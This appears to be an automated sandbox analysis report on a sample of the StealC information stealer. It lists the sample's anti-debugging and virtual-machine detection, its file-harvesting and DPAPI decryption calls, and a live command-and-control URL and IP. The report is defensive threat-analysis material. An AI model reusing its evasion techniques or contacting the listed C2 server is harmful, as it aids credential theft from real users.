Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB470 second address: 5AB479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB716 second address: 5AB722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8B151F0E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB722 second address: 5AB726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB726 second address: 5AB73F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8B151F0E36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8B151F0E3Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB8B4 second address: 5AB8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB8BC second address: 5AB8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B0361 second address: 5B0367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AFEC8 second address: 5AFEFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8B151F0E45h 0x00000008 jmp 00007F8B151F0E41h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B901C second address: 5B9028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8B146C0A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9028 second address: 5B902D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B902D second address: 5B9078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A15h 0x00000007 jnc 00007F8B146C0A08h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F8B146C0A12h 0x00000017 jl 00007F8B146C0A06h 0x0000001d jnp 00007F8B146C0A06h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8B146C0A14h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9078 second address: 5B9082 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B151F0E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9082 second address: 5B9088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9088 second address: 5B908C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B908C second address: 5B9092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9092 second address: 5B909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B909C second address: 5B90A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C07E9 second address: 5C07F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B151F0E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C2FBF second address: 5C2FC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C2FC8 second address: 5C2FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B151F0E46h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8B151F0E43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF586 second address: 5CF58A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF0FC second address: 5CF100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF100 second address: 5CF108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E052F second address: 5E0548 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B151F0E4Bh 0x00000008 jmp 00007F8B151F0E3Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFC97 second address: 5DFC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFDF7 second address: 5DFDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFDFD second address: 5DFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFE02 second address: 5DFE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFF50 second address: 5DFF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E00E9 second address: 5E00ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4ACF second address: 5E4AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4AD3 second address: 5E4AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4AD7 second address: 5E4AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4AE1 second address: 5E4B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jne 00007F8B151F0E4Eh 0x00000011 nop 0x00000012 xor dx, 757Bh 0x00000017 push 00000004h 0x00000019 call 00007F8B151F0E39h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007F8B151F0E36h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B31 second address: 5E4B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B37 second address: 5E4B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8B151F0E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B41 second address: 5E4B6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8B146C0A0Fh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8B146C0A0Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B6E second address: 5E4B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8B151F0E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E4B79 second address: 5E4BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F8B146C0A11h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnp 00007F8B146C0A06h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6111 second address: 5E611D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B151F0E36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E9A38 second address: 5E9A42 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B146C0A06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0295 second address: 52C0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0299 second address: 52C029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C029F second address: 52C02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B151F0E45h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C02B8 second address: 52C02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C02BC second address: 52C02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8B151F0E3Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8B151F0E40h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, 74435AF3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C02EC second address: 52C0374 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8B146C0A18h 0x00000008 jmp 00007F8B146C0A15h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8B146C0A0Eh 0x00000017 xor eax, 65588E58h 0x0000001d jmp 00007F8B146C0A0Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F8B146C0A18h 0x00000029 xor ax, 18B8h 0x0000002e jmp 00007F8B146C0A0Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0374 second address: 52C0378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0378 second address: 52C037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C037C second address: 52C0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0382 second address: 52C0388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03CD second address: 52C03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03D1 second address: 52C03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03D7 second address: 52C03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 46719984h 0x00000010 mov di, C9F0h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03FC second address: 52C0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0400 second address: 52C0410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 341A8C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 519D27 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_000F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_000EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_000EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000E16D0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E1160 GetSystemInfo,ExitProcess,

0_2_000E1160

Source: file.exe, file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001280000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: KE[OEgQEmUEr[E*`E

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_000E45C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_000F9860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9750 mov eax, dword ptr fs:[00000030h]

0_2_000F9750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000F7850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_000F9600

Source: file.exe, file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_000F7B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_000F6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000F7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_000F7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.e0000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_000EC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_000E7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_000E9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_000E9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_000F8EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

